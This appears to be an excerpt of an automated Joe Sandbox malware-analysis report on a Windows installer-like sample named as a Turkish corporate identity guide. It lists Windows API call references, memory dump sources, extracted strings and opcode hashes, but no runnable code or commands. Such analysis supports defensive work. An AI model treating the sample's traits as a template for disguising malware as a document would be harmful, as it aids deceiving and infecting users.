                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                • lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,771A23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                • lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                • Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                • Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
                                                                                                                                                • Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
                                                                                                                                                • Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                                                                                                • GetMessagePos.USER32 ref: 00404C0F
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                • String ID: f
                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,704D21EC,?,00000808), ref: 704D1635
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,704D21EC,?,00000808), ref: 704D163C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,704D21EC,?,00000808), ref: 704D1650
                                                                                                                                                • GetProcAddress.KERNEL32(!Mp,00000000), ref: 704D1657
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D1660
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                • String ID: !Mp
                                                                                                                                                • API String ID: 1148316912-117599701
                                                                                                                                                • Opcode ID: 06ed8d82ef2d1f2f00cb2d5f26814f922bb7732c679af3d1b4fb9a4ecf5f65ab
                                                                                                                                                • Instruction ID: c9941a481354fdcd81810a37c734bc564a2093a34f19acb536d9acae3705cd65
                                                                                                                                                • Opcode Fuzzy Hash: 06ed8d82ef2d1f2f00cb2d5f26814f922bb7732c679af3d1b4fb9a4ecf5f65ab
                                                                                                                                                • Instruction Fuzzy Hash: 8AF098732061387B96211BA78C48D9BBF9CDF8B2F5B210265F728E21A086A15D019BF1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                • MulDiv.KERNEL32(000B4BD5,00000064,000B4BD9), ref: 00402E3C
                                                                                                                                                • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                Strings
                                                                                                                                                • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                                                                                                                • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                                                                                                                • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 704D121B: GlobalAlloc.KERNELBASE(00000040,?,704D123B,?,704D12DF,00000019,704D11BE,-000000A0), ref: 704D1225
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 704D2657
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D268C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                • Opcode ID: c4969f2077059b9a2196a79896bdb25669587f37528df05b8e2c5cc3d9c686d8
                                                                                                                                                • Instruction ID: 335e87f653fb3eb0df9ca7c6caf73884aaccbcd96f3ecb4040b82c082e906e8d
                                                                                                                                                • Opcode Fuzzy Hash: c4969f2077059b9a2196a79896bdb25669587f37528df05b8e2c5cc3d9c686d8
                                                                                                                                                • Instruction Fuzzy Hash: EB31B232204201EFC7168F65DEA4E2E77BAFBD6304724456DF74193364CB39A816DB52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                                                                                                                • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                                                                                                                • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp$C:\Users\user\AppData\Local\Temp\nsa5F2F.tmp\System.dll
                                                                                                                                                • API String ID: 3109718747-1156910344
                                                                                                                                                • Opcode ID: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                • Instruction ID: 4af4a56a495a7247eb1268c7c56f37f79310e300d8c273c1dd4748c0a8a00d57
                                                                                                                                                • Opcode Fuzzy Hash: dda6ae717c315ba667b57b4a7a8c87f882e4d96db764385f0764a6bd2d6bbf98
                                                                                                                                                • Instruction Fuzzy Hash: 41110872A04301BADB046FB18E89A9F7664AF44398F24443FF103F61D0DAFC89416B5E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 704D24D6
                                                                                                                                                  • Part of subcall function 704D122C: lstrcpynW.KERNEL32(00000000,?,704D12DF,00000019,704D11BE,-000000A0), ref: 704D123C
                                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 704D245C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 704D2477
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1148824635.00000000704D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 704D0000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1148761933.00000000704D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148866058.00000000704D4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1148910359.00000000704D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_704d0000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                • Opcode ID: b1f5d5d69a6fbe254c4975370e3bc7e3cfce38bc3280b588062ef16958ecb751
                                                                                                                                                • Instruction ID: 79a495d6445af17b8404434f1cc1288e102d5a1f94f1ce7edfa69cbdf9dd864d
                                                                                                                                                • Opcode Fuzzy Hash: b1f5d5d69a6fbe254c4975370e3bc7e3cfce38bc3280b588062ef16958ecb751
                                                                                                                                                • Instruction Fuzzy Hash: 9941D0B1104305EFC3119F31DA64A2E77F8FBA8314F20496DEB4687751DB78A485CB62
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                                • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                                                                                                • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                                                                                                • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                • Opcode ID: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                • Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
                                                                                                                                                • Opcode Fuzzy Hash: 09c23d4a4ca6f0b232d113dc6f4b45afdfe06e4b3b74d97eac453210c4480ab0
                                                                                                                                                • Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1125006099.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.1124979141.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125036975.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125065801.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.1125264823.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_DHRI_kurumsal_kimlik_rehberi-2023.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                • String ID: !
                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                                                                                                • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                                                                                                • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                • wsprintfW.USER32 ref: 00404B88
